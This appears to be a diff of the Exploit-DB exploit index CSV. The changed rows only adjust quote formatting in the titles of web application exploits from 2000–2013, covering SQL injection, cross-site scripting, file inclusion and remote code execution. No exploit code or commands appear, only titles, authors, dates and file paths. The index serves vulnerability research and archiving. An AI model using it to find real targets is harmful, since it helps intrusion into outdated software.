+26036,7 @@ id,file,description,date,author,platform,type,port 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18590,platforms/php/webapps/18590.txt,"PBLang Bulletin Board System - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,php,webapps,0 -18592,platforms/php/webapps/18592.txt,"4Images - Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps,0 +18592,platforms/php/webapps/18592.txt,"4Images Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps,0 18597,platforms/hardware/webapps/18597.txt,"Sitecom WLM-2501 - Cross-Site Request Forgery",2012-03-14,"Ivano Binetti",hardware,webapps,0 18598,platforms/php/webapps/18598.txt,"Encaps PHP Gallery - SQL Injection",2012-03-14,"Daniel Godoy",php,webapps,0 18599,platforms/php/webapps/18599.txt,"asaanCart - Cross-Site Scripting / Local File Inclusion",2012-03-14,"Number 7",php,webapps,0 @@ -26100,7 +26102,7 @@ id,file,description,date,author,platform,type,port 18770,platforms/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,php,webapps,0 18773,platforms/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",php,webapps,0 18775,platforms/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,php,webapps,0 -18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0 +18778,platforms/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php p' Parameter SQL Injection",2012-04-24,G13,php,webapps,0 18782,platforms/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",php,webapps,0 18788,platforms/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,php,webapps,0 18787,platforms/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",php,webapps,0 @@ -26288,7 +26290,7 @@ id,file,description,date,author,platform,type,port 19864,platforms/php/webapps/19864.txt,"VamCart CMS 0.9 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19865,platforms/php/webapps/19865.txt,"PBBoard CMS 2.1.4 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,php,webapps,0 19898,platforms/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0 -20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting",2012-07-21,muts,php,webapps,0 +20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php symb' Parameter Cross-Site Scripting",2012-07-21,muts,php,webapps,0 19927,platforms/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,php,webapps,0 19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' Parameter SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 @@ -26296,7 +26298,7 @@ id,file,description,date,author,platform,type,port 20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php' q Parameter SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 -20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection",2012-07-23,muts,linux,webapps,0 +20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php id' Parameter Blind SQL Injection",2012-07-23,muts,linux,webapps,0 20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0 20055,platforms/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",php,webapps,0 20062,platforms/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL Injection",2012-07-23,muts,php,webapps,0 @@ -26305,7 +26307,7 @@ id,file,description,date,author,platform,type,port 20083,platforms/php/webapps/20083.txt,"WordPress Plugin Front End Upload 0.5.4.4 - Arbitrary '.PHP' File Upload",2012-07-24,"Chris Kellum",php,webapps,0 20087,platforms/php/webapps/20087.py,"Zabbix 2.0.1 - Session Extractor",2012-07-24,muts,php,webapps,0 20111,platforms/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,php,webapps,0 -20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 +20123,platforms/php/webapps/20123.py,"Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid' Parameter Blind SQL Injection",2012-07-30,Kc57,php,webapps,0 20124,platforms/windows/webapps/20124.txt,"Dr. Web Control Center 6.00.3.201111300 - Cross-Site Scripting",2012-07-31,"Oliver Karow",windows,webapps,0 20158,platforms/php/webapps/20158.txt,"PHP-Nuke 1.0/2.5 - Administrative Privileges",2000-08-21,bruj0,php,webapps,0 20166,platforms/php/webapps/20166.txt,"Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection",2012-08-01,"Patrick de Brouwer",php,webapps,0 @@ -26396,7 +26398,7 @@ id,file,description,date,author,platform,type,port 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection (Metasploit)",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro - Cross-Site Request Forgery",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 -20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection",2012-08-20,DaOne,php,webapps,0 +20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - 'index.php id' Parameter SQL Injection",2012-08-20,DaOne,php,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 - Arbitrary '.PHP' File Upload (Metasploit)",2012-08-22,Metasploit,php,webapps,0 20675,platforms/php/webapps/20675.py,"uebimiau webmail 2.7.2 - Persistent Cross-Site Scripting",2012-08-20,"Shai rod",php,webapps,0 20677,platforms/windows/webapps/20677.txt,"IOServer 1.0.18.0 - Directory Traversal",2012-08-20,hinge,windows,webapps,0 @@ -26440,13 +26442,13 @@ id,file,description,date,author,platform,type,port 20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 21005,platforms/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 -21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 +21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id' Parameter Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 -21833,platforms/php/webapps/21833.rb,"PhpTax - pfilez Parameter Exec Remote Code Injection (Metasploit)",2012-10-10,Metasploit,php,webapps,0 +21833,platforms/php/webapps/21833.rb,"PhpTax - 'pfilez' Parameter Exec Remote Code Injection (Metasploit)",2012-10-10,Metasploit,php,webapps,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 @@ -26623,7 +26625,7 @@ id,file,description,date,author,platform,type,port 21728,platforms/cgi/webapps/21728.txt,"Kerio MailServer 5.0/5.1 Web Mail - Multiple Cross-Site Scripting Vulnerabilities",2002-08-19,"Abraham Lincoln",cgi,webapps,0 21729,platforms/cgi/webapps/21729.txt,"Mozilla Bonsai - Multiple Cross-Site Scripting Vulnerabilities",2002-08-20,"Stan Bubrouski",cgi,webapps,0 21730,platforms/cgi/webapps/21730.txt,"Mozilla Bonsai 1.3 - Full Path Disclosure",2002-08-20,"Stan Bubrouski",cgi,webapps,0 -21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - server_sync.php Backdoor (Metasploit)",2012-10-10,Metasploit,php,webapps,0 +21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 - 'server_sync.php' Backdoor (Metasploit)",2012-10-10,Metasploit,php,webapps,0 21740,platforms/php/webapps/21740.txt,"phpMyChat Plus 1.94 RC1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21742,platforms/php/webapps/21742.txt,"Template CMS 2.1.1 - Multiple Vulnerabilities",2012-10-04,"High-Tech Bridge SA",php,webapps,0 21743,platforms/php/webapps/21743.txt,"phpMyBitTorrent 2.04 - Multiple Vulnerabilities",2012-10-04,waraxe,php,webapps,0 @@ -26638,7 +26640,7 @@ id,file,description,date,author,platform,type,port 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21783,platforms/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 -21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php month' Parameter SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,php,webapps,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 @@ -26680,13 +26682,13 @@ id,file,description,date,author,platform,type,port 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - SQL Injection",2002-10-08,hish,php,webapps,0 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,php,webapps,0 -21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - MsgError.asp Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 +21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - 'MsgError.asp' Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite - 'AthCGI.exe' Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 -21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 +21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - 'browse.php' Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 21929,platforms/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload (Metasploit)",2012-10-16,Metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 - PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 -21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 - add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 +21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 - 'add.php' Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 21946,platforms/java/webapps/21946.txt,"vBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps,0 21950,platforms/php/webapps/21950.txt,"YaBB 1.40/1.41 - Login Cross-Site Scripting",2002-10-18,"Nir Adar",php,webapps,0 21956,platforms/php/webapps/21956.txt,"KMMail 1.0 - E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps,0 @@ -26706,7 +26708,7 @@ id,file,description,date,author,platform,type,port 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection",2012-10-16,Zixem,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album' Parameter SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 @@ -26962,8 +26964,8 @@ id,file,description,date,author,platform,type,port 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 -22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 -22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps,0 @@ -27000,7 +27002,7 @@ id,file,description,date,author,platform,type,port 22829,platforms/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - user.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 @@ -27075,7 +27077,7 @@ id,file,description,date,author,platform,type,port 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php' 'idx' Parameter SQL Injection",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx' Parameter SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 @@ -27098,7 +27100,7 @@ id,file,description,date,author,platform,type,port 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - 'HTMLtags.php' Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - 'id' Parameter SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem' Parameter SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 @@ -27156,7 +27158,7 @@ id,file,description,date,author,platform,type,port 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,php,webapps,0 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,php,webapps,0 -23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 +23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - 'admin.php' SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 23238,platforms/php/webapps/23238.txt,"Gallery 1.4 - 'index.php' Remote File Inclusion",2003-10-11,peter,php,webapps,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent Cross-Site Scripting",2012-12-09,VipVince,php,webapps,0 @@ -27301,7 +27303,7 @@ id,file,description,date,author,platform,type,port 23621,platforms/php/webapps/23621.txt,"Laurent Adda Les Commentaires 2.0 - PHP Script 'admin.php' Remote File Inclusion",2004-01-30,"Himeur Nourredine",php,webapps,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - 'search.php' SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - 'index.php id' Parameter SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 23635,platforms/asp/webapps/23635.txt,"Niti Telecom Caravan Business Server 2.00-03D - Directory Traversal",2004-02-02,dr_insane,asp,webapps,0 @@ -27379,7 +27381,7 @@ id,file,description,date,author,platform,type,port 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 -23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 +23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php basepath' Parameter Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - modules.php gid Parameter SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - nmimage.php z Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 @@ -27396,7 +27398,7 @@ id,file,description,date,author,platform,type,port 23834,platforms/php/webapps/23834.txt,"Mambo Open Source 4.5 - 'index.php' SQL Injection",2004-03-16,JeiAr,php,webapps,0 23835,platforms/php/webapps/23835.txt,"PHP-Nuke 6.x/7.0/7.1 - Image Tag Admin Command Execution",2004-03-16,"Janek Vind",php,webapps,0 23843,platforms/php/webapps/23843.txt,"Belchior Foundry VCard 2.8 - Authentication Bypass",2004-03-17,"saudi linux",php,webapps,0 -23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 +23844,platforms/php/webapps/23844.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php language' Parameter Full Path Disclosure",2004-03-18,"Janek Vind",php,webapps,0 23845,platforms/php/webapps/23845.txt,"PHP-Nuke Error Manager Module 2.1 - 'error.php' Multiple Parameters Cross-Site Scripting",2004-03-18,"Janek Vind",php,webapps,0 23851,platforms/asp/webapps/23851.txt,"Expinion.net Member Management System 2.1 - 'news_view.asp' ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23852,platforms/asp/webapps/23852.txt,"Expinion.net Member Management System 2.1 - resend.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -27585,7 +27587,7 @@ id,file,description,date,author,platform,type,port 24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - 'module_db.php' Remote File Inclusion",2004-06-15,loofus,php,webapps,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x - Registration_Rules.asp Cross-Site Scripting",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 - usersL.php3 Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 -24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass",2004-06-15,HEX,php,webapps,0 +24216,platforms/php/webapps/24216.html,"phpHeaven phpMyChat 0.14.5 - 'edituser.php3 do_not_login' Parameter Authentication Bypass",2004-06-15,HEX,php,webapps,0 24217,platforms/php/webapps/24217.txt,"phpHeaven phpMyChat 0.14.5 - admin.php3 Arbitrary File Access",2004-06-15,HEX,php,webapps,0 24225,platforms/php/webapps/24225.php,"osTicket STS 1.2 - Attachment Remote Command Execution",2004-06-21,"Guy Pearce",php,webapps,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 @@ -27611,7 +27613,7 @@ id,file,description,date,author,platform,type,port 24257,platforms/php/webapps/24257.txt,"Jaws 0.2/0.3 - 'action' Parameter Cross-Site Scripting",2004-07-06,"Fernando Quintero",php,webapps,0 24260,platforms/asp/webapps/24260.txt,"Comersus Open Technologies Comersus 5.0 - comersus_gatewayPayPal.asp Price Manipulation",2004-07-07,"Thomas Ryan",asp,webapps,0 24261,platforms/asp/webapps/24261.txt,"Comersus Open Technologies Comersus 5.0 - comersus_message.asp Cross-Site Scripting",2004-07-07,"Thomas Ryan",asp,webapps,0 -24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection",2013-01-21,haidao,php,webapps,0 +24269,platforms/php/webapps/24269.txt,"NConf 1.3 - 'detail.php detail_admin_items.php id' Parameter SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 - Blog_Exec.php Cross-Site Scripting",2004-08-07,"befcake beefy",php,webapps,0 24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x - viewtopic.php PHP Script Injection",2004-07-12,"sasan hezarkhani",php,webapps,0 @@ -27707,7 +27709,7 @@ id,file,description,date,author,platform,type,port 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x < 2.0.4 - File Disclosure / Directory Traversal",2013-02-04,NightlyDev,php,webapps,0 